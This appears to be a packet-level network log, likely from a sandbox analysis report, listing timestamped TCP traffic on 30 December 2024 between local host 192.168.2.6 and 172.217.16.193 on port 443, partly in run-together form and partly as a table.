                                                                                                  Dec 30, 2024 10:57:07.644969940 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.645013094 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.645987988 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.647654057 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.647695065 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.647695065 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.647706032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.647753954 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.649684906 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.651889086 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.651926994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.651935101 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.651942015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.651978016 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.653800964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.655874014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.655916929 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.655921936 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.658083916 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.658124924 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.658130884 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.658137083 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.658178091 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.661660910 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.662921906 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.662957907 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.662969112 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.662974119 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.663016081 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.664952040 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.667002916 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.667042971 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.667047977 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.668215036 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.668257952 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.668257952 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.668267012 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.668312073 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.670229912 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.672138929 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.672178030 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.672180891 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.672190905 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.672231913 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.676424026 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.676984072 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.677021027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.677028894 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.677033901 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.677077055 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.678857088 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.680819988 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.680864096 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.680871010 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.682744980 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.682780027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.682792902 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.682797909 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.682837009 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.684694052 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.686539888 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.686583042 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.686588049 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.688566923 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.688605070 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.688606977 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.688616037 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.688656092 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.690212965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.692087889 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.811331987 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.811605930 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.811657906 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.811697960 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.811702967 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815371990 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815403938 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815413952 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.815418005 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815460920 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815463066 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.815469980 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.815515995 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.815521955 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819247961 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819288015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819289923 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.819297075 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819343090 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.819344997 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819355011 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.819390059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.819396019 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823261023 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823298931 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823308945 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.823318958 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823364973 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.823411942 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823471069 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.823507071 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.823513031 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836430073 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836463928 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836483002 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.836488008 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836523056 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836549997 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.836555004 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836591959 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.836596966 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836951971 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836982965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.836998940 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.837003946 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.837034941 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.837044954 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.837049007 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.837110043 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.843239069 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843408108 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843446970 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843461037 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.843466043 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843518972 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.843813896 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843887091 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.843938112 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.843943119 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849252939 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849287033 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849302053 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.849307060 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849347115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849350929 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.849355936 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.849405050 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.854854107 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.854917049 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.854958057 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.854963064 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.855118036 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.855149984 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.855168104 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.855173111 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.855215073 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.860369921 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860487938 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860526085 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860538006 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.860542059 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860580921 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860582113 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.860589027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.860630989 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.865808964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866036892 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866065979 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866082907 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.866087914 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866115093 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866143942 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.866149902 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.866199970 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.871026039 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871081114 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871114016 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871124029 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.871133089 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871172905 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871187925 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.871193886 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.871339083 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.874489069 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874555111 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874588013 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874597073 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.874600887 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874634027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874649048 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.874653101 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.874692917 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.879594088 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879678011 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879709959 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879723072 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.879729033 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879776955 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879780054 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.879786015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.879822016 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884774923 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884865999 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884896994 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884922981 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884927034 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.884974003 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.884979010 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889487028 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889523983 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889529943 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889534950 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889576912 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889580965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889723063 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889755964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889774084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.889777899 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.889826059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.893965006 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894020081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894049883 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894062996 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.894068003 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.894099951 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.894104958 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.897973061 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898020029 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898041964 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898047924 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898077965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898091078 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898096085 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.898175955 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.898183107 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.901782036 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.901829004 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.901834965 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902028084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902060032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902070045 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.902075052 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.902112961 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.902117968 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.905999899 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906037092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:07.906059027 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:07.906064987 CET44349711172.217.16.193192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 10:57:07.906106949 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.906196117 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.906250000 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.906289101 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.906295061 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910034895 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910083055 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910103083 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.910108089 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910140991 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910161972 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.910167933 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.910223961 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.910316944 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916093111 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916126013 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916157007 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.916158915 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916167974 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916222095 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.916353941 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.916414022 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.916419029 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.925976992 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.926019907 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.926026106 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.926209927 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.926244020 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.926259995 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.926265001 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.926311970 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.926316023 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.931931973 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.931965113 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.931981087 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.931986094 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.932020903 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.932029009 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.932034016 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.932084084 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.932087898 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937527895 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937560081 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937576056 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.937581062 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937621117 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.937624931 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937804937 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.937922001 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.937927008 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943025112 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943068027 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.943073034 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943218946 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943259001 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943269014 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.943274021 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.943330050 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.948452950 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.948507071 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.948537111 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.948544979 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.948549986 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.948590040 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.948656082 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953821898 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953855991 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953866959 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.953871965 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953917980 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.953919888 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953928947 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.953978062 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.953982115 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
